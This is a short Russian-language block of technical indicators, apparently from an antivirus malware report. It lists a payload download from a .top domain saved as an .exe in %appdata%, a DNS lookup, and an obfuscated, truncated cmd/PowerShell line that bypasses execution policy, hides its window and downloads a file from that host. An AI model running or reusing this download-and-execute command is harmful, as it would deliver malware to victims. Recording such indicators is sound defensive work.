Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OwERs^HEL^l^.^exe -^EXEcU^T^iOnpolIc^y ^BypaSs ^-nOP^R^OF^i^LE -^WI^nD^Ow^Sty^L^e^ hID^DE^N (ne^W^-^oB^jEct ^SYsTEm^.nET.webcl^IeNT).^DowN^l^oAdf^I^L^e('http://newyeargoka...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "P^OwERs^HEL^l^.^exe -^EXEcU^T^iOnpolIc^y ^BypaSs ^-nOP^R^OF^i^LE -^WI^nD^Ow^Sty^L^e^ hID^DE^N (ne^W^-^oB^jEct ^SYsTEm^.nET.webcl^IeNT).^DowN^l^oAdf^I^L^e('http://newyeargoka...' (со скрытым окном)